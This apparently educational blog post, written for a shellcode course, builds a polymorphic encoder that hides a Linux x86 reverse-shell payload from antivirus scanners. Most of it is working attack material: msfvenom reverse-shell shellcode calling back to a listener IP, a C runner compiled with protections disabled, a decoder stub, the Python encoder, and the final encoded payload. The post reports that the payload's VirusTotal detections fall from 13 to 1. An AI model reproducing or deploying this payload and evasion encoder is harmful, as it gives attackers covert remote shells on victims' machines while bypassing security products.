SLAE32 - Custom shellcode encoder - fzm.ooo— pentester and red teamer by day, security researcher and developer at night.

Introduction

In this post we are going to design and implement a custom polymorphic encoder. It uses a basic polymorphic engine to produce unique variations of the encoded shellcode, in order to reduce the chances of the shellcode being flagged as malicious when security products perform static analysis on the binary.

The goal of the encoder we are going to implement is simply to show that encoding well-known shellcode is a viable way to make detection harder for products that rely on signatures. This alone is almost certainly not enough to bypass modern EDRs, which rely not only on signatures but also on several other factors to classify a file as malicious (especially in the Windows world).

Enough with the ramblings, let’s dive into the code!

Original shellcode

To start off, we can use msfvenom to generate the shellcode for an unstaged TCP reverse shell for the Linux x86 architecture.

$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=7001 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x38\x65\x68"
"\x02\x00\x1b\x59\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

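As a quick sanity check, we can locate the LHOST and LPORT values inside the generated bytes. The sketch below is only an illustration and not part of the original workflow. It assumes that the payload pushes the IPv4 address and the family/port pair of the sockaddr_in structure as immediates, which is what the \x68 (push imm32) opcodes in the dump suggest.

```python
import socket
import struct

# Shellcode bytes copied from the msfvenom output above
buf = (
    b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    b"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x38\x65\x68"
    b"\x02\x00\x1b\x59\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
    b"\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
    b"\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
)

ip_bytes = socket.inet_aton("192.168.56.101")      # 4 bytes, network byte order
port_bytes = struct.pack(">H", 7001)               # 2 bytes, network byte order
family_port = struct.pack("<H", 2) + port_bytes    # AF_INET = 2, little endian

# Assumption: both values are pushed with "push imm32" (opcode 0x68)
ip_offset = buf.find(b"\x68" + ip_bytes)
port_offset = buf.find(b"\x68" + family_port)
null_count = buf.count(0)

print("length:", len(buf))
print("push <ip> at offset:", ip_offset)
print("push <family|port> at offset:", port_offset)
print("null bytes:", null_count)
```

The only null byte in the payload sits in the family/port pair (the high byte of AF_INET), so the raw msfvenom output is not null-free to begin with.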
We can then add the shellcode to the C template, and compile it with gcc.

unsigned char code[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x38\x65\x68"
"\x02\x00\x1b\x59\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void) {
    int (*ret)() = (int(*)())code;
    ret();
}

$ gcc -w -fno-stack-protector -z execstack run_sc.c -o plain_sc

Finally, we upload the resulting ELF binary to VirusTotal to check the detection rate of the shellcode before the encoding phase. As expected, the shellcode is flagged as malicious by many engines (13 out of 64).

VirusTotal analysis of plain shellcode

Encoding scheme

The encoder performs the following operations on the provided shellcode:

Adds NOP padding at the end of the original shellcode, so that its length is a multiple of 4 bytes

Then, each chunk of 4 bytes is processed like so:

A random byte in range [0x01,0xff] is inserted before the 4-byte chunk
The 1st byte is negated using the NOT operator
The 2nd byte is xor’ed with the random byte
The 3rd byte is negated using the NOT operator
The 4th byte is xor’ed with the original 2nd byte and with the random byte
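The per-chunk steps above can be sketched in a few lines of Python. This is a minimal illustration and not the encoder script itself: the function name encode_chunk and the sample random byte 0x5a are made up for the example, and "the 2nd byte" is read as the original (not yet encoded) 2nd byte.

```python
def encode_chunk(chunk: bytes, rand: int) -> bytes:
    """Encode one 4-byte chunk into 5 bytes (hypothetical helper)."""
    if len(chunk) != 4 or not 0x01 <= rand <= 0xff:
        raise ValueError("expected a 4-byte chunk and a random byte in 0x01..0xff")
    b1, b2, b3, b4 = chunk
    return bytes([
        rand,             # the random byte is inserted before the chunk
        b1 ^ 0xff,        # 1st byte: NOT
        b2 ^ rand,        # 2nd byte: XOR with the random byte
        b3 ^ 0xff,        # 3rd byte: NOT
        b4 ^ b2 ^ rand,   # 4th byte: XOR with the original 2nd byte and the random byte
    ])

# First four bytes of the reverse shell, with 0x5a as an arbitrary random byte
print(encode_chunk(b"\x31\xdb\xf7\xe3", 0x5a).hex())   # prints 5ace810862
```

Since the random byte changes on every run, the same 4 input bytes can map to many different 5-byte outputs, which is where the polymorphism comes from.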

The diagram below shows the encoding process in action:

Shellcode Decoder

The next step is writing a decoder stub that retrieves the address of the encoded shellcode via jmp-call-pop and loops over it until the end marker byte is hit. At that point the shellcode is completely decoded, and the stub can just jump to the beginning of the shellcode, which then gets executed on the victim host.
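Before writing any assembly, the loop described above can be modelled in Python to check the logic. This is only a sketch: the function name decode and the variables src and dst are made up for the example, and play the roles of a read pointer and a write pointer over the same buffer. The sample input is a single chunk encoded by hand with the random byte 0x5a, followed by 0xaa as end marker.

```python
def decode(encoded: bytes, end_marker: int) -> bytes:
    """Decode in place until the end marker is found at a chunk boundary."""
    buf = bytearray(encoded)
    src = dst = 0                          # read pointer and write pointer
    while buf[src] != end_marker:          # the marker is only tested here
        rand = buf[src]                    # keep a copy of the random byte
        buf[dst] = buf[src + 1] ^ 0xff                        # 1st byte: NOT
        buf[dst + 1] = buf[src + 2] ^ rand                    # 2nd byte: XOR random
        buf[dst + 2] = buf[src + 3] ^ 0xff                    # 3rd byte: NOT
        buf[dst + 3] = buf[src + 4] ^ rand ^ buf[dst + 1]     # 4th byte
        src += 5                           # next encoded block
        dst += 4                           # next slot for decoded bytes
    return bytes(buf[:dst])

sample = bytes.fromhex("5ace810862") + b"\xaa"
print(decode(sample, 0xaa).hex())          # prints 31dbf7e3
```

Writing the decoded bytes over the encoded ones is safe because the write pointer never gets ahead of the read pointer. If the marker is missing, this model fails with an IndexError, whereas a real stub would keep walking through memory.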

Since we don’t have our encoded shellcode yet, we can use the bytes from 0x01 to 0x09 as a placeholder, so that we can easily tell the decoder stub and the encoded shellcode apart in the byte dump of the decoder.

We are also going to use 0xaa as end marker for now. The encoder script will take care of choosing the end marker value dynamically.

global _start

section .text
_start:
    jmp short to_decode

decode:
    pop esi                   ; addr of shellcode
    push esi
    pop edi                   ; copy of shellcode addr
    xor eax, eax
    xor ebx, ebx
    xor edx, edx

decode_loop:
    cmp byte [esi], 0xaa      ; compare with end marker
    je shellcode              ; jump to decoded shellcode

    mov al, byte [esi]        ; make a copy of the random byte

    xor byte [esi+1], 0xff    ; 1st byte: NOT
    mov bl, byte [esi+1]
    mov byte [edi], bl        ; move the 1st byte back in place

    xor byte [esi+2], al      ; 2nd byte: XOR with the random byte (0th)
    mov bl, byte [esi+2]
    mov byte [edi+1], bl      ; move the 2nd byte back in place

    xor byte [esi+3], 0xff    ; 3rd byte: NOT
    mov bl, byte [esi+3]
    mov byte [edi+2], bl      ; move the 3rd byte back in place

                              ; 4th byte: XOR with the random byte and with the decoded 2nd byte
    mov dl, byte [edi+1]      ; get the value of the decoded 2nd byte
    xor byte [esi+4], al      ; XOR with the random byte
    xor byte [esi+4], dl      ; XOR with the decoded 2nd byte
    mov bl, byte [esi+4]
    mov byte [edi+3], bl      ; move the 4th byte back in place

    add esi, 0x05             ; move esi to the next block of encoded shellcode
    add edi, 0x04             ; move edi to the next slot for the decoded shellcode
    jmp short decode_loop     ; jump back and keep decoding

to_decode:
    call decode
    shellcode: db 0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09
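To double check the jmp-call-pop layout, we can compute where each relative jump in the assembled stub lands. The sketch below assumes that assembling the listing above yields the same 74 bytes that are embedded in the encoder script later in this post, with the placeholder 0xaa in the marker slot. The instruction offsets (0, 14, 67 and 69) were obtained by counting bytes by hand, and the helper names are made up for the example.

```python
import struct

# Assembled decoder stub, with the placeholder end marker 0xaa at offset 13
stub = (
    b"\xeb\x43\x5e\x56\x5f\x31\xc0\x31\xdb\x31\xd2\x80\x3e"
    b"\xaa"
    b"\x74\x3a\x8a\x06\x80\x76\x01\xff\x8a\x5e\x01\x88\x1f"
    b"\x30\x46\x02\x8a\x5e\x02\x88\x5f\x01\x80\x76\x03\xff"
    b"\x8a\x5e\x03\x88\x5f\x02\x8a\x57\x01\x30\x46\x04\x30"
    b"\x56\x04\x8a\x5e\x04\x88\x5f\x03\x83\xc6\x05\x83\xc7"
    b"\x04\xeb\xc6\xe8\xb8\xff\xff\xff"
)

def rel8_target(code: bytes, offset: int) -> int:
    """Target of a 2-byte jump: opcode plus signed 8-bit displacement."""
    (disp,) = struct.unpack_from("b", code, offset + 1)
    return offset + 2 + disp

def rel32_target(code: bytes, offset: int) -> int:
    """Target of a 5-byte call: opcode plus signed 32-bit displacement."""
    (disp,) = struct.unpack_from("<i", code, offset + 1)
    return offset + 5 + disp

print("stub length:          ", len(stub))               # 74
print("jmp short to_decode ->", rel8_target(stub, 0))    # 69, the call
print("je shellcode        ->", rel8_target(stub, 14))   # 74, first byte after the stub
print("jmp short decode_loop ->", rel8_target(stub, 67)) # 11, the cmp
print("call decode         ->", rel32_target(stub, 69))  # 2, the pop esi
```

The call sits at the very end of the stub, so the return address it pushes is offset 74, which is exactly where the encoded shellcode starts. That is the address pop esi picks up, and also where je lands once the marker is found.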

Encoder Implementation

The encoding scheme presented in the previous paragraphs can be implemented as a Python script that:

takes the original shellcode and the decoder stub
encodes the original shellcode
replaces the end marker in the decoder stub with a byte that does not exist in the encoded shellcode
prepends the decoder stub to the encoded shellcode

#!/usr/bin/env python3

import sys
import random

...[snippet]...

def process_decoder(shellcode):
    missing_bytes = find_missing_bytes(shellcode)
    if len(missing_bytes) == 0:
        print('[!] ERROR. The encoder is not able to process this shellcode')
        sys.exit(1)

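    # The marker is drawn from the original shellcode bytes. The decoder only
    # compares it with the random byte that starts each chunk, and encode_sc()
    # never uses the marker value as a random byte.
    end_marker_byte = random.choice(shellcode)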
    print('[*] End marker: 0x%02x' % end_marker_byte)

    dec_stub = bytearray(b''.join([
        b'\xeb\x43\x5e\x56\x5f\x31\xc0\x31\xdb\x31\xd2\x80\x3e',
        bytes([end_marker_byte]),
        b'\x74\x3a\x8a\x06\x80\x76\x01\xff\x8a\x5e\x01\x88\x1f',
        b'\x30\x46\x02\x8a\x5e\x02\x88\x5f\x01\x80\x76\x03\xff',
        b'\x8a\x5e\x03\x88\x5f\x02\x8a\x57\x01\x30\x46\x04\x30',
        b'\x56\x04\x8a\x5e\x04\x88\x5f\x03\x83\xc6\x05\x83\xc7',
        b'\x04\xeb\xc6\xe8\xb8\xff\xff\xff'
        ])
    )

    return dec_stub, end_marker_byte

def encode_sc(shellcode):
    encoded_sc_esc = ''
    encoded_sc_0x  = ''
    enc_shellcode = bytearray()
    orig_shellcode_len = len(shellcode)

    dec_stub, end_marker = process_decoder(shellcode)

    if len(shellcode) % 4 != 0:
        print('[*] Adding padding to shellcode so it is 4-byte aligned ...')
        shellcode = add_padding(shellcode)

    print('[*] Encoding shellcode ...')
    for i in range(0, len(shellcode), 4):
        # Prepend random byte each chunk of 4 bytes
        randbyte = end_marker
        while randbyte == end_marker:
            randbyte = random.randrange(0x01, 0x100)  # upper bound is exclusive: 0x01..0xff
        enc_shellcode.append(randbyte)

        # Processing chunks
        enc_shellcode.append(shellcode[i] ^ 0xff)
        enc_shellcode.append(shellcode[i+1] ^ randbyte)
        enc_shellcode.append(shellcode[i+2] ^ 0xff)
        enc_shellcode.append(shellcode[i+3] ^ shellcode[i+1] ^ randbyte)


    print('[*] Appending 0x%02x marker at the end of the encoded shellcode' % end_marker)
    enc_shellcode.append(end_marker)

    print('[*] New shellcode length: %s' % len(enc_shellcode))
    inc_rate = -100 + (len(enc_shellcode)) * 100 / orig_shellcode_len
    print('[*] Increase rate: %.02f %%' % inc_rate)

    # Check null bytes
    if has_nulls(enc_shellcode):
        print('[!] WARNING. There are null bytes in the shellcode!')
    else:
        print('[*] SUCCESS! There are no null bytes in the encoded shellcode!')

    return dec_stub+enc_shellcode


...[snippet]...

if __name__ == '__main__':

    # TCP reverse shell shellcode
    shellcode = bytearray(b''.join([
        b'\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66',
        b'\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0',
        b'\xa8\x38\x65\x68\x02\x00\x1b\x59\x89\xe1\xb0\x66\x50',
        b'\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73',
        b'\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0',
        b'\x0b\xcd\x80'
        ])
    )

    print('[*] Original shellcode lenght: %s' % len(shellcode))

    encoded_sc = encode_sc(shellcode)
    print_shellcode(encoded_sc)
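The listing above elides the helpers find_missing_bytes, add_padding, has_nulls and print_shellcode. The sketch below shows one way they might look. It is a guess based only on how they are called and on the output format, so the real implementations in the repository may well differ (for example in which byte values count as "missing").

```python
def find_missing_bytes(shellcode):
    """Return the non-null byte values that never occur in the shellcode."""
    present = set(shellcode)
    return [b for b in range(0x01, 0x100) if b not in present]

def add_padding(shellcode):
    """Append NOPs (0x90) until the length is a multiple of 4."""
    return shellcode + b'\x90' * (-len(shellcode) % 4)

def has_nulls(shellcode):
    """True if at least one byte of the shellcode is 0x00."""
    return 0 in shellcode

def print_shellcode(shellcode, width=16):
    """Print the bytes as a C array, `width` escaped bytes per line."""
    print('unsigned char code[] = (')
    for i in range(0, len(shellcode), width):
        line = ''.join('\\x%02x' % b for b in shellcode[i:i + width])
        print('"%s"' % line)
    print(');')

print_shellcode(add_padding(bytearray(b'\x31\xdb\xf7\xe3\x53')))
```

All four helpers accept both bytes and bytearray, which matches the way the script passes bytearray objects around.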

The encoded shellcode can be generated by running the Python script.

slae@Ubuntu32:~/SLAE-Assignments/A4$ ./encoder.py
[*] Original shellcode lenght: 68
[*] Found 217 bytes not in shellcode
[*] End marker: 0x68
[*] Encoding shellcode ...
[*] Appending 0x68 marker at the end of the encoded shellcode
[*] New shellcode length: 86
[*] Increase rate: 26.47 %
[*] SUCCESS! There are no null bytes in the encoded shellcode!

unsigned char code[] = (
"\xeb\x43\x5e\x56\x5f\x31\xc0\x31\xdb\x31\xd2\x80\x3e\x68\x74\x3a"
"\x8a\x06\x80\x76\x01\xff\x8a\x5e\x01\x88\x1f\x30\x46\x02\x8a\x5e"
"\x02\x88\x5f\x01\x80\x76\x03\xff\x8a\x5e\x03\x88\x5f\x02\x8a\x57"
"\x01\x30\x46\x04\x30\x56\x04\x8a\x5e\x04\x88\x5f\x03\x83\xc6\x05"
"\x83\xc7\x04\xeb\xc6\xe8\xb8\xff\xff\xff\xf4\x6f\x64\x6f\x55\xd3"
"\x24\x24\x1c\x77\x62\xbc\x31\x95\x33\x6b\x76\x8a\x4f\xec\xe1\x32"
"\x61\x6c\x38\x7c\x4f\x43\x32\xc3\xf1\xb6\x88\x06\xe0\xe3\x3f\x4b"
"\xc7\x2e\x2a\x97\x28\xff\x33\x74\xa6\xfd\x1e\x4d\x41\x99\x11\xae"
"\x42\xe8\x4c\xeb\x76\x0a\x49\x32\xc9\xad\xa1\xfa\x91\xd5\x8c\xbd"
"\x82\x97\xad\xd0\xcf\xa6\x96\x2f\x1c\x7d\x70\xac\xf9\x1e\x49\x8e"
"\xf4\x43\x7f\xd3\x68"
);
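The length and the increase rate reported in the log above follow directly from the scheme: every 4-byte chunk grows to 5 bytes, and one end marker byte is appended. A small sketch of the arithmetic, where the function name encoded_length is made up for the example:

```python
import math

def encoded_length(shellcode_len: int) -> int:
    """Length of the encoded shellcode, without the decoder stub."""
    chunks = math.ceil(shellcode_len / 4)   # padding rounds up to full chunks
    return chunks * 5 + 1                   # 5 bytes per chunk, plus the end marker

orig_len = 68
new_len = encoded_length(orig_len)
inc_rate = -100 + new_len * 100 / orig_len  # same formula as in encode_sc()

print('[*] New shellcode length: %s' % new_len)     # 86
print('[*] Increase rate: %.02f %%' % inc_rate)     # 26.47 %
```

Note that the script measures enc_shellcode only, so the decoder stub that gets prepended to the final payload is not included in these figures.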

Detection rate after encoding

We can now add the encoded shellcode to the C template, compile it with gcc, and upload the final ELF binary to VirusTotal, to verify that the custom encoder has lowered the chances of our shellcode being flagged as malware by AV engines.

unsigned char code[] = (
"\xeb\x43\x5e\x56\x5f\x31\xc0\x31\xdb\x31\xd2\x80\x3e\x68\x74\x3a"
"\x8a\x06\x80\x76\x01\xff\x8a\x5e\x01\x88\x1f\x30\x46\x02\x8a\x5e"
"\x02\x88\x5f\x01\x80\x76\x03\xff\x8a\x5e\x03\x88\x5f\x02\x8a\x57"
"\x01\x30\x46\x04\x30\x56\x04\x8a\x5e\x04\x88\x5f\x03\x83\xc6\x05"
"\x83\xc7\x04\xeb\xc6\xe8\xb8\xff\xff\xff\xf4\x6f\x64\x6f\x55\xd3"
"\x24\x24\x1c\x77\x62\xbc\x31\x95\x33\x6b\x76\x8a\x4f\xec\xe1\x32"
"\x61\x6c\x38\x7c\x4f\x43\x32\xc3\xf1\xb6\x88\x06\xe0\xe3\x3f\x4b"
"\xc7\x2e\x2a\x97\x28\xff\x33\x74\xa6\xfd\x1e\x4d\x41\x99\x11\xae"
"\x42\xe8\x4c\xeb\x76\x0a\x49\x32\xc9\xad\xa1\xfa\x91\xd5\x8c\xbd"
"\x82\x97\xad\xd0\xcf\xa6\x96\x2f\x1c\x7d\x70\xac\xf9\x1e\x49\x8e"
"\xf4\x43\x7f\xd3\x68"
);

int main(void) {
    int (*ret)() = (int(*)())code;
    ret();
}

$ gcc -w -fno-stack-protector -z execstack run_sc.c -o enc_sc

VirusTotal analysis of encoded shellcode

The new executable is now detected as being potentially dangerous by just one engine (probably because of the template, rather than the shellcode).

Conclusion

Even though there’s still plenty of room for improvement, obfuscating a very well-known shellcode sample with a custom encoder dropped the detection rate for the reverse shell shellcode from 13/64 to 1/64.

If you want to check out the code for the encoder we created, you can find it in the slae32 repository on my GitHub.

Thank you for reading!
